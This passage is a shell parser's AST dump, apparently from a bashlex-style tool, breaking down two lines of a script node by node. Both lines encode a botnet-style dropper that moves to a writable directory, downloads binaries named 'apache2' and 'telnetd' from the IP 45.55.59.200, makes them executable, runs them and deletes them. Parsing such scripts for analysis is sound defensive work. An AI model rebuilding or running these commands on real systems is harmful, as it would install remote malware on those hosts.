    WordNode(lineno=15, pos=(1631, 1633), word='cd'),
    WordNode(lineno=15, pos=(1634, 1638), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1639, 1641)),
  CommandNode(lineno=15, pos=(1642, 1650), parts=[
    WordNode(lineno=15, pos=(1642, 1644), word='cd'),
    WordNode(lineno=15, pos=(1645, 1650), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1651, 1653)),
  CommandNode(lineno=15, pos=(1654, 1658), parts=[
    WordNode(lineno=15, pos=(1654, 1656), word='cd'),
    WordNode(lineno=15, pos=(1657, 1658), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1658, 1659)),
  CommandNode(lineno=15, pos=(1660, 1692), parts=[
    WordNode(lineno=15, pos=(1660, 1664), word='wget'),
    WordNode(lineno=15, pos=(1665, 1692), word='http://45.55.59.200/apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1692, 1693)),
  CommandNode(lineno=15, pos=(1694, 1710), parts=[
    WordNode(lineno=15, pos=(1694, 1699), word='chmod'),
    WordNode(lineno=15, pos=(1700, 1702), word='+x'),
    WordNode(lineno=15, pos=(1703, 1710), word='apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1710, 1711)),
  CommandNode(lineno=15, pos=(1712, 1721), parts=[
    WordNode(lineno=15, pos=(1712, 1721), word='./apache2'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1721, 1722)),
  CommandNode(lineno=15, pos=(1723, 1737), parts=[
    WordNode(lineno=15, pos=(1723, 1725), word='rm'),
    WordNode(lineno=15, pos=(1726, 1729), word='-rf'),
    WordNode(lineno=15, pos=(1730, 1737), word='apache2'),
  ]),
])
ListNode(lineno=16, pos=(1738, 1870), parts=[
  CommandNode(lineno=16, pos=(1738, 1745), parts=[
    WordNode(lineno=16, pos=(1738, 1740), word='cd'),
    WordNode(lineno=16, pos=(1741, 1745), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1746, 1748)),
  CommandNode(lineno=16, pos=(1749, 1760), parts=[
    WordNode(lineno=16, pos=(1749, 1751), word='cd'),
    WordNode(lineno=16, pos=(1752, 1760), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1761, 1763)),
  CommandNode(lineno=16, pos=(1764, 1771), parts=[
    WordNode(lineno=16, pos=(1764, 1766), word='cd'),
    WordNode(lineno=16, pos=(1767, 1771), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1772, 1774)),
  CommandNode(lineno=16, pos=(1775, 1783), parts=[
    WordNode(lineno=16, pos=(1775, 1777), word='cd'),
    WordNode(lineno=16, pos=(1778, 1783), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1784, 1786)),
  CommandNode(lineno=16, pos=(1787, 1791), parts=[
    WordNode(lineno=16, pos=(1787, 1789), word='cd'),
    WordNode(lineno=16, pos=(1790, 1791), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1791, 1792)),
  CommandNode(lineno=16, pos=(1793, 1825), parts=[
    WordNode(lineno=16, pos=(1793, 1797), word='wget'),
    WordNode(lineno=16, pos=(1798, 1825), word='http://45.55.59.200/telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1825, 1826)),
  CommandNode(lineno=16, pos=(1827, 1843), parts=[
    WordNode(lineno=16, pos=(1827, 1832), word='chmod'),
    WordNode(lineno=16, pos=(1833, 1835), word='+x'),
    WordNode(lineno=16, pos=(1836, 1843), word='telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1843, 1844)),
  CommandNode(lineno=16, pos=(1845, 1854), parts=[
    WordNode(lineno=16, pos=(1845, 1854), word='./telnetd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1854, 1855)),
  CommandNode(lineno=16, pos=(1856, 1870), parts=[
    WordNode(lineno=16, pos=(1856, 1858), word='rm'),
    WordNode(lineno=16, pos=(1859, 1862), word='-rf'),
    WordNode(lineno=16, pos=(1863, 1870), word='telnetd'),
  ]),
])
